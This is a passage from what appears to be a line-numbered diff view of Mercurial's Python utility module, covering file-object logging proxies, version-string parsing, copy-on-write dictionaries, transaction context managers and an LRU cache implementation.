575 r'fileno', *args, **kwargs)
575 r'fileno', *args, **kwargs)
576
576
577 def flush(self, *args, **kwargs):
577 def flush(self, *args, **kwargs):
578 return object.__getattribute__(self, r'_observedcall')(
578 return object.__getattribute__(self, r'_observedcall')(
579 r'flush', *args, **kwargs)
579 r'flush', *args, **kwargs)
580
580
581 def isatty(self, *args, **kwargs):
581 def isatty(self, *args, **kwargs):
582 return object.__getattribute__(self, r'_observedcall')(
582 return object.__getattribute__(self, r'_observedcall')(
583 r'isatty', *args, **kwargs)
583 r'isatty', *args, **kwargs)
584
584
585 def readable(self, *args, **kwargs):
585 def readable(self, *args, **kwargs):
586 return object.__getattribute__(self, r'_observedcall')(
586 return object.__getattribute__(self, r'_observedcall')(
587 r'readable', *args, **kwargs)
587 r'readable', *args, **kwargs)
588
588
589 def readline(self, *args, **kwargs):
589 def readline(self, *args, **kwargs):
590 return object.__getattribute__(self, r'_observedcall')(
590 return object.__getattribute__(self, r'_observedcall')(
591 r'readline', *args, **kwargs)
591 r'readline', *args, **kwargs)
592
592
593 def readlines(self, *args, **kwargs):
593 def readlines(self, *args, **kwargs):
594 return object.__getattribute__(self, r'_observedcall')(
594 return object.__getattribute__(self, r'_observedcall')(
595 r'readlines', *args, **kwargs)
595 r'readlines', *args, **kwargs)
596
596
597 def seek(self, *args, **kwargs):
597 def seek(self, *args, **kwargs):
598 return object.__getattribute__(self, r'_observedcall')(
598 return object.__getattribute__(self, r'_observedcall')(
599 r'seek', *args, **kwargs)
599 r'seek', *args, **kwargs)
600
600
601 def seekable(self, *args, **kwargs):
601 def seekable(self, *args, **kwargs):
602 return object.__getattribute__(self, r'_observedcall')(
602 return object.__getattribute__(self, r'_observedcall')(
603 r'seekable', *args, **kwargs)
603 r'seekable', *args, **kwargs)
604
604
605 def tell(self, *args, **kwargs):
605 def tell(self, *args, **kwargs):
606 return object.__getattribute__(self, r'_observedcall')(
606 return object.__getattribute__(self, r'_observedcall')(
607 r'tell', *args, **kwargs)
607 r'tell', *args, **kwargs)
608
608
609 def truncate(self, *args, **kwargs):
609 def truncate(self, *args, **kwargs):
610 return object.__getattribute__(self, r'_observedcall')(
610 return object.__getattribute__(self, r'_observedcall')(
611 r'truncate', *args, **kwargs)
611 r'truncate', *args, **kwargs)
612
612
613 def writable(self, *args, **kwargs):
613 def writable(self, *args, **kwargs):
614 return object.__getattribute__(self, r'_observedcall')(
614 return object.__getattribute__(self, r'_observedcall')(
615 r'writable', *args, **kwargs)
615 r'writable', *args, **kwargs)
616
616
617 def writelines(self, *args, **kwargs):
617 def writelines(self, *args, **kwargs):
618 return object.__getattribute__(self, r'_observedcall')(
618 return object.__getattribute__(self, r'_observedcall')(
619 r'writelines', *args, **kwargs)
619 r'writelines', *args, **kwargs)
620
620
621 def read(self, *args, **kwargs):
621 def read(self, *args, **kwargs):
622 return object.__getattribute__(self, r'_observedcall')(
622 return object.__getattribute__(self, r'_observedcall')(
623 r'read', *args, **kwargs)
623 r'read', *args, **kwargs)
624
624
625 def readall(self, *args, **kwargs):
625 def readall(self, *args, **kwargs):
626 return object.__getattribute__(self, r'_observedcall')(
626 return object.__getattribute__(self, r'_observedcall')(
627 r'readall', *args, **kwargs)
627 r'readall', *args, **kwargs)
628
628
629 def readinto(self, *args, **kwargs):
629 def readinto(self, *args, **kwargs):
630 return object.__getattribute__(self, r'_observedcall')(
630 return object.__getattribute__(self, r'_observedcall')(
631 r'readinto', *args, **kwargs)
631 r'readinto', *args, **kwargs)
632
632
633 def write(self, *args, **kwargs):
633 def write(self, *args, **kwargs):
634 return object.__getattribute__(self, r'_observedcall')(
634 return object.__getattribute__(self, r'_observedcall')(
635 r'write', *args, **kwargs)
635 r'write', *args, **kwargs)
636
636
637 def detach(self, *args, **kwargs):
637 def detach(self, *args, **kwargs):
638 return object.__getattribute__(self, r'_observedcall')(
638 return object.__getattribute__(self, r'_observedcall')(
639 r'detach', *args, **kwargs)
639 r'detach', *args, **kwargs)
640
640
641 def read1(self, *args, **kwargs):
641 def read1(self, *args, **kwargs):
642 return object.__getattribute__(self, r'_observedcall')(
642 return object.__getattribute__(self, r'_observedcall')(
643 r'read1', *args, **kwargs)
643 r'read1', *args, **kwargs)
644
644
645 class observedbufferedinputpipe(bufferedinputpipe):
645 class observedbufferedinputpipe(bufferedinputpipe):
646 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
646 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
647
647
648 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
648 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
649 bypass ``fileobjectproxy``. Because of this, we need to make
649 bypass ``fileobjectproxy``. Because of this, we need to make
650 ``bufferedinputpipe`` aware of these operations.
650 ``bufferedinputpipe`` aware of these operations.
651
651
652 This variation of ``bufferedinputpipe`` can notify observers about
652 This variation of ``bufferedinputpipe`` can notify observers about
653 ``os.read()`` events. It also re-publishes other events, such as
653 ``os.read()`` events. It also re-publishes other events, such as
654 ``read()`` and ``readline()``.
654 ``read()`` and ``readline()``.
655 """
655 """
656 def _fillbuffer(self):
656 def _fillbuffer(self):
657 res = super(observedbufferedinputpipe, self)._fillbuffer()
657 res = super(observedbufferedinputpipe, self)._fillbuffer()
658
658
659 fn = getattr(self._input._observer, r'osread', None)
659 fn = getattr(self._input._observer, r'osread', None)
660 if fn:
660 if fn:
661 fn(res, _chunksize)
661 fn(res, _chunksize)
662
662
663 return res
663 return res
664
664
665 # We use different observer methods because the operation isn't
665 # We use different observer methods because the operation isn't
666 # performed on the actual file object but on us.
666 # performed on the actual file object but on us.
667 def read(self, size):
667 def read(self, size):
668 res = super(observedbufferedinputpipe, self).read(size)
668 res = super(observedbufferedinputpipe, self).read(size)
669
669
670 fn = getattr(self._input._observer, r'bufferedread', None)
670 fn = getattr(self._input._observer, r'bufferedread', None)
671 if fn:
671 if fn:
672 fn(res, size)
672 fn(res, size)
673
673
674 return res
674 return res
675
675
676 def readline(self, *args, **kwargs):
676 def readline(self, *args, **kwargs):
677 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
677 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
678
678
679 fn = getattr(self._input._observer, r'bufferedreadline', None)
679 fn = getattr(self._input._observer, r'bufferedreadline', None)
680 if fn:
680 if fn:
681 fn(res)
681 fn(res)
682
682
683 return res
683 return res
684
684
685 DATA_ESCAPE_MAP = {pycompat.bytechr(i): br'\x%02x' % i for i in range(256)}
685 DATA_ESCAPE_MAP = {pycompat.bytechr(i): br'\x%02x' % i for i in range(256)}
686 DATA_ESCAPE_MAP.update({
686 DATA_ESCAPE_MAP.update({
687 b'\\': b'\\\\',
687 b'\\': b'\\\\',
688 b'\r': br'\r',
688 b'\r': br'\r',
689 b'\n': br'\n',
689 b'\n': br'\n',
690 })
690 })
691 DATA_ESCAPE_RE = remod.compile(br'[\x00-\x08\x0a-\x1f\\\x7f-\xff]')
691 DATA_ESCAPE_RE = remod.compile(br'[\x00-\x08\x0a-\x1f\\\x7f-\xff]')
692
692
693 def escapedata(s):
693 def escapedata(s):
694 if isinstance(s, bytearray):
694 if isinstance(s, bytearray):
695 s = bytes(s)
695 s = bytes(s)
696
696
697 return DATA_ESCAPE_RE.sub(lambda m: DATA_ESCAPE_MAP[m.group(0)], s)
697 return DATA_ESCAPE_RE.sub(lambda m: DATA_ESCAPE_MAP[m.group(0)], s)
698
698
699 class fileobjectobserver(object):
699 class fileobjectobserver(object):
700 """Logs file object activity."""
700 """Logs file object activity."""
701 def __init__(self, fh, name, reads=True, writes=True, logdata=False):
701 def __init__(self, fh, name, reads=True, writes=True, logdata=False):
702 self.fh = fh
702 self.fh = fh
703 self.name = name
703 self.name = name
704 self.logdata = logdata
704 self.logdata = logdata
705 self.reads = reads
705 self.reads = reads
706 self.writes = writes
706 self.writes = writes
707
707
708 def _writedata(self, data):
708 def _writedata(self, data):
709 if not self.logdata:
709 if not self.logdata:
710 self.fh.write('\n')
710 self.fh.write('\n')
711 return
711 return
712
712
713 # Simple case writes all data on a single line.
713 # Simple case writes all data on a single line.
714 if b'\n' not in data:
714 if b'\n' not in data:
715 self.fh.write(': %s\n' % escapedata(data))
715 self.fh.write(': %s\n' % escapedata(data))
716 return
716 return
717
717
718 # Data with newlines is written to multiple lines.
718 # Data with newlines is written to multiple lines.
719 self.fh.write(':\n')
719 self.fh.write(':\n')
720 lines = data.splitlines(True)
720 lines = data.splitlines(True)
721 for line in lines:
721 for line in lines:
722 self.fh.write('%s> %s\n' % (self.name, escapedata(line)))
722 self.fh.write('%s> %s\n' % (self.name, escapedata(line)))
723
723
724 def read(self, res, size=-1):
724 def read(self, res, size=-1):
725 if not self.reads:
725 if not self.reads:
726 return
726 return
727 # Python 3 can return None from reads at EOF instead of empty strings.
727 # Python 3 can return None from reads at EOF instead of empty strings.
728 if res is None:
728 if res is None:
729 res = ''
729 res = ''
730
730
731 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
731 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
732 self._writedata(res)
732 self._writedata(res)
733
733
734 def readline(self, res, limit=-1):
734 def readline(self, res, limit=-1):
735 if not self.reads:
735 if not self.reads:
736 return
736 return
737
737
738 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
738 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
739 self._writedata(res)
739 self._writedata(res)
740
740
741 def readinto(self, res, dest):
741 def readinto(self, res, dest):
742 if not self.reads:
742 if not self.reads:
743 return
743 return
744
744
745 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
745 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
746 res))
746 res))
747 data = dest[0:res] if res is not None else b''
747 data = dest[0:res] if res is not None else b''
748 self._writedata(data)
748 self._writedata(data)
749
749
750 def write(self, res, data):
750 def write(self, res, data):
751 if not self.writes:
751 if not self.writes:
752 return
752 return
753
753
754 # Python 2 returns None from some write() calls. Python 3 (reasonably)
754 # Python 2 returns None from some write() calls. Python 3 (reasonably)
755 # returns the integer bytes written.
755 # returns the integer bytes written.
756 if res is None and data:
756 if res is None and data:
757 res = len(data)
757 res = len(data)
758
758
759 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
759 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
760 self._writedata(data)
760 self._writedata(data)
761
761
762 def flush(self, res):
762 def flush(self, res):
763 if not self.writes:
763 if not self.writes:
764 return
764 return
765
765
766 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
766 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
767
767
768 # For observedbufferedinputpipe.
768 # For observedbufferedinputpipe.
769 def bufferedread(self, res, size):
769 def bufferedread(self, res, size):
770 self.fh.write('%s> bufferedread(%d) -> %d' % (
770 self.fh.write('%s> bufferedread(%d) -> %d' % (
771 self.name, size, len(res)))
771 self.name, size, len(res)))
772 self._writedata(res)
772 self._writedata(res)
773
773
774 def bufferedreadline(self, res):
774 def bufferedreadline(self, res):
775 self.fh.write('%s> bufferedreadline() -> %d' % (self.name, len(res)))
775 self.fh.write('%s> bufferedreadline() -> %d' % (self.name, len(res)))
776 self._writedata(res)
776 self._writedata(res)
777
777
778 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
778 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
779 logdata=False):
779 logdata=False):
780 """Turn a file object into a logging file object."""
780 """Turn a file object into a logging file object."""
781
781
782 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
782 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
783 logdata=logdata)
783 logdata=logdata)
784 return fileobjectproxy(fh, observer)
784 return fileobjectproxy(fh, observer)
785
785
786 def version():
786 def version():
787 """Return version information if available."""
787 """Return version information if available."""
788 try:
788 try:
789 from . import __version__
789 from . import __version__
790 return __version__.version
790 return __version__.version
791 except ImportError:
791 except ImportError:
792 return 'unknown'
792 return 'unknown'
793
793
794 def versiontuple(v=None, n=4):
794 def versiontuple(v=None, n=4):
795 """Parses a Mercurial version string into an N-tuple.
795 """Parses a Mercurial version string into an N-tuple.
796
796
797 The version string to be parsed is specified with the ``v`` argument.
797 The version string to be parsed is specified with the ``v`` argument.
798 If it isn't defined, the current Mercurial version string will be parsed.
798 If it isn't defined, the current Mercurial version string will be parsed.
799
799
800 ``n`` can be 2, 3, or 4. Here is how some version strings map to
800 ``n`` can be 2, 3, or 4. Here is how some version strings map to
801 returned values:
801 returned values:
802
802
803 >>> v = b'3.6.1+190-df9b73d2d444'
803 >>> v = b'3.6.1+190-df9b73d2d444'
804 >>> versiontuple(v, 2)
804 >>> versiontuple(v, 2)
805 (3, 6)
805 (3, 6)
806 >>> versiontuple(v, 3)
806 >>> versiontuple(v, 3)
807 (3, 6, 1)
807 (3, 6, 1)
808 >>> versiontuple(v, 4)
808 >>> versiontuple(v, 4)
809 (3, 6, 1, '190-df9b73d2d444')
809 (3, 6, 1, '190-df9b73d2d444')
810
810
811 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
811 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
812 (3, 6, 1, '190-df9b73d2d444+20151118')
812 (3, 6, 1, '190-df9b73d2d444+20151118')
813
813
814 >>> v = b'3.6'
814 >>> v = b'3.6'
815 >>> versiontuple(v, 2)
815 >>> versiontuple(v, 2)
816 (3, 6)
816 (3, 6)
817 >>> versiontuple(v, 3)
817 >>> versiontuple(v, 3)
818 (3, 6, None)
818 (3, 6, None)
819 >>> versiontuple(v, 4)
819 >>> versiontuple(v, 4)
820 (3, 6, None, None)
820 (3, 6, None, None)
821
821
822 >>> v = b'3.9-rc'
822 >>> v = b'3.9-rc'
823 >>> versiontuple(v, 2)
823 >>> versiontuple(v, 2)
824 (3, 9)
824 (3, 9)
825 >>> versiontuple(v, 3)
825 >>> versiontuple(v, 3)
826 (3, 9, None)
826 (3, 9, None)
827 >>> versiontuple(v, 4)
827 >>> versiontuple(v, 4)
828 (3, 9, None, 'rc')
828 (3, 9, None, 'rc')
829
829
830 >>> v = b'3.9-rc+2-02a8fea4289b'
830 >>> v = b'3.9-rc+2-02a8fea4289b'
831 >>> versiontuple(v, 2)
831 >>> versiontuple(v, 2)
832 (3, 9)
832 (3, 9)
833 >>> versiontuple(v, 3)
833 >>> versiontuple(v, 3)
834 (3, 9, None)
834 (3, 9, None)
835 >>> versiontuple(v, 4)
835 >>> versiontuple(v, 4)
836 (3, 9, None, 'rc+2-02a8fea4289b')
836 (3, 9, None, 'rc+2-02a8fea4289b')
837 """
837 """
838 if not v:
838 if not v:
839 v = version()
839 v = version()
840 parts = remod.split('[\+-]', v, 1)
840 parts = remod.split('[\+-]', v, 1)
841 if len(parts) == 1:
841 if len(parts) == 1:
842 vparts, extra = parts[0], None
842 vparts, extra = parts[0], None
843 else:
843 else:
844 vparts, extra = parts
844 vparts, extra = parts
845
845
846 vints = []
846 vints = []
847 for i in vparts.split('.'):
847 for i in vparts.split('.'):
848 try:
848 try:
849 vints.append(int(i))
849 vints.append(int(i))
850 except ValueError:
850 except ValueError:
851 break
851 break
852 # (3, 6) -> (3, 6, None)
852 # (3, 6) -> (3, 6, None)
853 while len(vints) < 3:
853 while len(vints) < 3:
854 vints.append(None)
854 vints.append(None)
855
855
856 if n == 2:
856 if n == 2:
857 return (vints[0], vints[1])
857 return (vints[0], vints[1])
858 if n == 3:
858 if n == 3:
859 return (vints[0], vints[1], vints[2])
859 return (vints[0], vints[1], vints[2])
860 if n == 4:
860 if n == 4:
861 return (vints[0], vints[1], vints[2], extra)
861 return (vints[0], vints[1], vints[2], extra)
862
862
863 def cachefunc(func):
863 def cachefunc(func):
864 '''cache the result of function calls'''
864 '''cache the result of function calls'''
865 # XXX doesn't handle keywords args
865 # XXX doesn't handle keywords args
866 if func.__code__.co_argcount == 0:
866 if func.__code__.co_argcount == 0:
867 cache = []
867 cache = []
868 def f():
868 def f():
869 if len(cache) == 0:
869 if len(cache) == 0:
870 cache.append(func())
870 cache.append(func())
871 return cache[0]
871 return cache[0]
872 return f
872 return f
873 cache = {}
873 cache = {}
874 if func.__code__.co_argcount == 1:
874 if func.__code__.co_argcount == 1:
875 # we gain a small amount of time because
875 # we gain a small amount of time because
876 # we don't need to pack/unpack the list
876 # we don't need to pack/unpack the list
877 def f(arg):
877 def f(arg):
878 if arg not in cache:
878 if arg not in cache:
879 cache[arg] = func(arg)
879 cache[arg] = func(arg)
880 return cache[arg]
880 return cache[arg]
881 else:
881 else:
882 def f(*args):
882 def f(*args):
883 if args not in cache:
883 if args not in cache:
884 cache[args] = func(*args)
884 cache[args] = func(*args)
885 return cache[args]
885 return cache[args]
886
886
887 return f
887 return f
888
888
889 class cow(object):
889 class cow(object):
890 """helper class to make copy-on-write easier
890 """helper class to make copy-on-write easier
891
891
892 Call preparewrite before doing any writes.
892 Call preparewrite before doing any writes.
893 """
893 """
894
894
895 def preparewrite(self):
895 def preparewrite(self):
896 """call this before writes, return self or a copied new object"""
896 """call this before writes, return self or a copied new object"""
897 if getattr(self, '_copied', 0):
897 if getattr(self, '_copied', 0):
898 self._copied -= 1
898 self._copied -= 1
899 return self.__class__(self)
899 return self.__class__(self)
900 return self
900 return self
901
901
902 def copy(self):
902 def copy(self):
903 """always do a cheap copy"""
903 """always do a cheap copy"""
904 self._copied = getattr(self, '_copied', 0) + 1
904 self._copied = getattr(self, '_copied', 0) + 1
905 return self
905 return self
906
906
907 class sortdict(collections.OrderedDict):
907 class sortdict(collections.OrderedDict):
908 '''a simple sorted dictionary
908 '''a simple sorted dictionary
909
909
910 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
910 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
911 >>> d2 = d1.copy()
911 >>> d2 = d1.copy()
912 >>> d2
912 >>> d2
913 sortdict([('a', 0), ('b', 1)])
913 sortdict([('a', 0), ('b', 1)])
914 >>> d2.update([(b'a', 2)])
914 >>> d2.update([(b'a', 2)])
915 >>> list(d2.keys()) # should still be in last-set order
915 >>> list(d2.keys()) # should still be in last-set order
916 ['b', 'a']
916 ['b', 'a']
917 '''
917 '''
918
918
919 def __setitem__(self, key, value):
919 def __setitem__(self, key, value):
920 if key in self:
920 if key in self:
921 del self[key]
921 del self[key]
922 super(sortdict, self).__setitem__(key, value)
922 super(sortdict, self).__setitem__(key, value)
923
923
924 if pycompat.ispypy:
924 if pycompat.ispypy:
925 # __setitem__() isn't called as of PyPy 5.8.0
925 # __setitem__() isn't called as of PyPy 5.8.0
926 def update(self, src):
926 def update(self, src):
927 if isinstance(src, dict):
927 if isinstance(src, dict):
928 src = src.iteritems()
928 src = src.iteritems()
929 for k, v in src:
929 for k, v in src:
930 self[k] = v
930 self[k] = v
931
931
932 class cowdict(cow, dict):
932 class cowdict(cow, dict):
933 """copy-on-write dict
933 """copy-on-write dict
934
934
935 Be sure to call d = d.preparewrite() before writing to d.
935 Be sure to call d = d.preparewrite() before writing to d.
936
936
937 >>> a = cowdict()
937 >>> a = cowdict()
938 >>> a is a.preparewrite()
938 >>> a is a.preparewrite()
939 True
939 True
940 >>> b = a.copy()
940 >>> b = a.copy()
941 >>> b is a
941 >>> b is a
942 True
942 True
943 >>> c = b.copy()
943 >>> c = b.copy()
944 >>> c is a
944 >>> c is a
945 True
945 True
946 >>> a = a.preparewrite()
946 >>> a = a.preparewrite()
947 >>> b is a
947 >>> b is a
948 False
948 False
949 >>> a is a.preparewrite()
949 >>> a is a.preparewrite()
950 True
950 True
951 >>> c = c.preparewrite()
951 >>> c = c.preparewrite()
952 >>> b is c
952 >>> b is c
953 False
953 False
954 >>> b is b.preparewrite()
954 >>> b is b.preparewrite()
955 True
955 True
956 """
956 """
957
957
958 class cowsortdict(cow, sortdict):
958 class cowsortdict(cow, sortdict):
959 """copy-on-write sortdict
959 """copy-on-write sortdict
960
960
961 Be sure to call d = d.preparewrite() before writing to d.
961 Be sure to call d = d.preparewrite() before writing to d.
962 """
962 """
963
963
964 class transactional(object):
964 class transactional(object):
965 """Base class for making a transactional type into a context manager."""
965 """Base class for making a transactional type into a context manager."""
966 __metaclass__ = abc.ABCMeta
966 __metaclass__ = abc.ABCMeta
967
967
968 @abc.abstractmethod
968 @abc.abstractmethod
969 def close(self):
969 def close(self):
970 """Successfully closes the transaction."""
970 """Successfully closes the transaction."""
971
971
972 @abc.abstractmethod
972 @abc.abstractmethod
973 def release(self):
973 def release(self):
974 """Marks the end of the transaction.
974 """Marks the end of the transaction.
975
975
976 If the transaction has not been closed, it will be aborted.
976 If the transaction has not been closed, it will be aborted.
977 """
977 """
978
978
979 def __enter__(self):
979 def __enter__(self):
980 return self
980 return self
981
981
982 def __exit__(self, exc_type, exc_val, exc_tb):
982 def __exit__(self, exc_type, exc_val, exc_tb):
983 try:
983 try:
984 if exc_type is None:
984 if exc_type is None:
985 self.close()
985 self.close()
986 finally:
986 finally:
987 self.release()
987 self.release()
988
988
989 @contextlib.contextmanager
989 @contextlib.contextmanager
990 def acceptintervention(tr=None):
990 def acceptintervention(tr=None):
991 """A context manager that closes the transaction on InterventionRequired
991 """A context manager that closes the transaction on InterventionRequired
992
992
993 If no transaction was provided, this simply runs the body and returns
993 If no transaction was provided, this simply runs the body and returns
994 """
994 """
995 if not tr:
995 if not tr:
996 yield
996 yield
997 return
997 return
998 try:
998 try:
999 yield
999 yield
1000 tr.close()
1000 tr.close()
1001 except error.InterventionRequired:
1001 except error.InterventionRequired:
1002 tr.close()
1002 tr.close()
1003 raise
1003 raise
1004 finally:
1004 finally:
1005 tr.release()
1005 tr.release()
1006
1006
1007 @contextlib.contextmanager
1007 @contextlib.contextmanager
1008 def nullcontextmanager():
1008 def nullcontextmanager():
1009 yield
1009 yield
1010
1010
1011 class _lrucachenode(object):
1011 class _lrucachenode(object):
1012 """A node in a doubly linked list.
1012 """A node in a doubly linked list.
1013
1013
1014 Holds a reference to nodes on either side as well as a key-value
1014 Holds a reference to nodes on either side as well as a key-value
1015 pair for the dictionary entry.
1015 pair for the dictionary entry.
1016 """
1016 """
1017 __slots__ = (u'next', u'prev', u'key', u'value')
1017 __slots__ = (u'next', u'prev', u'key', u'value')
1018
1018
1019 def __init__(self):
1019 def __init__(self):
1020 self.next = None
1020 self.next = None
1021 self.prev = None
1021 self.prev = None
1022
1022
1023 self.key = _notset
1023 self.key = _notset
1024 self.value = None
1024 self.value = None
1025
1025
1026 def markempty(self):
1026 def markempty(self):
1027 """Mark the node as emptied."""
1027 """Mark the node as emptied."""
1028 self.key = _notset
1028 self.key = _notset
1029
1029
1030 class lrucachedict(object):
1030 class lrucachedict(object):
1031 """Dict that caches most recent accesses and sets.
1031 """Dict that caches most recent accesses and sets.
1032
1032
1033 The dict consists of an actual backing dict - indexed by original
1033 The dict consists of an actual backing dict - indexed by original
1034 key - and a doubly linked circular list defining the order of entries in
1034 key - and a doubly linked circular list defining the order of entries in
1035 the cache.
1035 the cache.
1036
1036
1037 The head node is the newest entry in the cache. If the cache is full,
1037 The head node is the newest entry in the cache. If the cache is full,
1038 we recycle head.prev and make it the new head. Cache accesses result in
1038 we recycle head.prev and make it the new head. Cache accesses result in
1039 the node being moved to before the existing head and being marked as the
1039 the node being moved to before the existing head and being marked as the
1040 new head node.
1040 new head node.
1041 """
1041 """
1042 def __init__(self, max):
1042 def __init__(self, max):
1043 self._cache = {}
1043 self._cache = {}
1044
1044
1045 self._head = head = _lrucachenode()
1045 self._head = head = _lrucachenode()
1046 head.prev = head
1046 head.prev = head
1047 head.next = head
1047 head.next = head
1048 self._size = 1
1048 self._size = 1
1049 self._capacity = max
1049 self._capacity = max
1050
1050
1051 def __len__(self):
1051 def __len__(self):
1052 return len(self._cache)
1052 return len(self._cache)
1053
1053
1054 def __contains__(self, k):
1054 def __contains__(self, k):
1055 return k in self._cache
1055 return k in self._cache
1056
1056
1057 def __iter__(self):
1057 def __iter__(self):
1058 # We don't have to iterate in cache order, but why not.
1058 # We don't have to iterate in cache order, but why not.
1059 n = self._head
1059 n = self._head
1060 for i in range(len(self._cache)):
1060 for i in range(len(self._cache)):
1061 yield n.key
1061 yield n.key
1062 n = n.next
1062 n = n.next
1063
1063
1064 def __getitem__(self, k):
1064 def __getitem__(self, k):
1065 node = self._cache[k]
1065 node = self._cache[k]
1066 self._movetohead(node)
1066 self._movetohead(node)
1067 return node.value
1067 return node.value
1068
1068
1069 def __setitem__(self, k, v):
1069 def __setitem__(self, k, v):
1070 node = self._cache.get(k)
1070 node = self._cache.get(k)
1071 # Replace existing value and mark as newest.
1071 # Replace existing value and mark as newest.
1072 if node is not None:
1072 if node is not None:
1073 node.value = v
1073 node.value = v
1074 self._movetohead(node)
1074 self._movetohead(node)
1075 return
1075 return
1076
1076
1077 if self._size < self._capacity:
1077 if self._size < self._capacity:
1078 node = self._addcapacity()
1078 node = self._addcapacity()
1079 else:
1079 else:
1080 # Grab the last/oldest item.
1080 # Grab the last/oldest item.
1081 node = self._head.prev
1081 node = self._head.prev
1082
1082
1083 # At capacity. Kill the old entry.
1083 # At capacity. Kill the old entry.
1084 if node.key is not _notset:
1084 if node.key is not _notset:
1085 del self._cache[node.key]
1085 del self._cache[node.key]
1086
1086
1087 node.key = k
1087 node.key = k
1088 node.value = v
1088 node.value = v
1089 self._cache[k] = node
1089 self._cache[k] = node
1090 # And mark it as newest entry. No need to adjust order since it
1090 # And mark it as newest entry. No need to adjust order since it
1091 # is already self._head.prev.
1091 # is already self._head.prev.
1092 self._head = node
1092 self._head = node
1093
1093
1094 def __delitem__(self, k):
1094 def __delitem__(self, k):
1095 node = self._cache.pop(k)
1095 node = self._cache.pop(k)
1096 node.markempty()
1096 node.markempty()
1097
1097
1098 # Temporarily mark as newest item before re-adjusting head to make
1098 # Temporarily mark as newest item before re-adjusting head to make
1099 # this node the oldest item.
1099 # this node the oldest item.
1100 self._movetohead(node)
1100 self._movetohead(node)
1101 self._head = node.next
1101 self._head = node.next
1102
1102
1103 # Additional dict methods.
1103 # Additional dict methods.
1104
1104
1105 def get(self, k, default=None):
1105 def get(self, k, default=None):
1106 try:
1106 try:
1107 return self._cache[k].value
1107 return self._cache[k].value
1108 except KeyError:
1108 except KeyError:
1109 return default
1109 return default
1110
1110
1111 def clear(self):
1111 def clear(self):
1112 n = self._head
1112 n = self._head
1113 while n.key is not _notset:
1113 while n.key is not _notset:
1114 n.markempty()
1114 n.markempty()
1115 n = n.next
1115 n = n.next
1116
1116
1117 self._cache.clear()
1117 self._cache.clear()
1118
1118
1119 def copy(self):
1119 def copy(self):
1120 result = lrucachedict(self._capacity)
1120 result = lrucachedict(self._capacity)
1121 n = self._head.prev
1121 n = self._head.prev
1122 # Iterate in oldest-to-newest order, so the copy has the right ordering
1122 # Iterate in oldest-to-newest order, so the copy has the right ordering
1123 for i in range(len(self._cache)):
1123 for i in range(len(self._cache)):
1124 result[n.key] = n.value
1124 result[n.key] = n.value
1125 n = n.prev
1125 n = n.prev
1126 return result
1126 return result
1127
1127
1128 def _movetohead(self, node):
1128 def _movetohead(self, node):
1129 """Mark a node as the newest, making it the new head.
1129 """Mark a node as the newest, making it the new head.
1130
1130
1131 When a node is accessed, it becomes the freshest entry in the LRU
1131 When a node is accessed, it becomes the freshest entry in the LRU
1132 list, which is denoted by self._head.
1132 list, which is denoted by self._head.
1133
1133
1134 Visually, let's make ``N`` the new head node (* denotes head):
1134 Visually, let's make ``N`` the new head node (* denotes head):
1135
1135
1136 previous/oldest <-> head <-> next/next newest
1136 previous/oldest <-> head <-> next/next newest
1137
1137
1138 ----<->--- A* ---<->-----
1138 ----<->--- A* ---<->-----
1139 | |
1139 | |
1140 E <-> D <-> N <-> C <-> B
1140 E <-> D <-> N <-> C <-> B
1141
1141
1142 To:
1142 To:
1143
1143
1144 ----<->--- N* ---<->-----
1144 ----<->--- N* ---<->-----
1145 | |
1145 | |
1146 E <-> D <-> C <-> B <-> A
1146 E <-> D <-> C <-> B <-> A
1147
1147
1148 This requires the following moves:
1148 This requires the following moves:
1149
1149
1150 C.next = D (node.prev.next = node.next)
1150 C.next = D (node.prev.next = node.next)
1151 D.prev = C (node.next.prev = node.prev)
1151 D.prev = C (node.next.prev = node.prev)
1152 E.next = N (head.prev.next = node)
1152 E.next = N (head.prev.next = node)
1153 N.prev = E (node.prev = head.prev)
1153 N.prev = E (node.prev = head.prev)
1154 N.next = A (node.next = head)
1154 N.next = A (node.next = head)
1155 A.prev = N (head.prev = node)
1155 A.prev = N (head.prev = node)
1156 """
1156 """
1157 head = self._head
1157 head = self._head
1158 # C.next = D
1158 # C.next = D
1159 node.prev.next = node.next
1159 node.prev.next = node.next
1160 # D.prev = C
1160 # D.prev = C
1161 node.next.prev = node.prev
1161 node.next.prev = node.prev
1162 # N.prev = E
1162 # N.prev = E
1163 node.prev = head.prev
1163 node.prev = head.prev
1164 # N.next = A
1164 # N.next = A
1165 # It is tempting to do just "head" here, however if node is
1165 # It is tempting to do just "head" here, however if node is
1166 # adjacent to head, this will do bad things.
1166 # adjacent to head, this will do bad things.
1167 node.next = head.prev.next
1167 node.next = head.prev.next
1168 # E.next = N
1168 # E.next = N
1169 node.next.prev = node
1169 node.next.prev = node
1170 # A.prev = N
1170 # A.prev = N
1171 node.prev.next = node
1171 node.prev.next = node
1172
1172
1173 self._head = node
1173 self._head = node
1174
1174
1175 def _addcapacity(self):
1175 def _addcapacity(self):
1176 """Add a node to the circular linked list.
1176 """Add a node to the circular linked list.
1177
1177
1178 The new node is inserted before the head node.
1178 The new node is inserted before the head node.
1179 """
1179 """
1180 head = self._head
1180 head = self._head
1181 node = _lrucachenode()
1181 node = _lrucachenode()
1182 head.prev.next = node
1182 head.prev.next = node
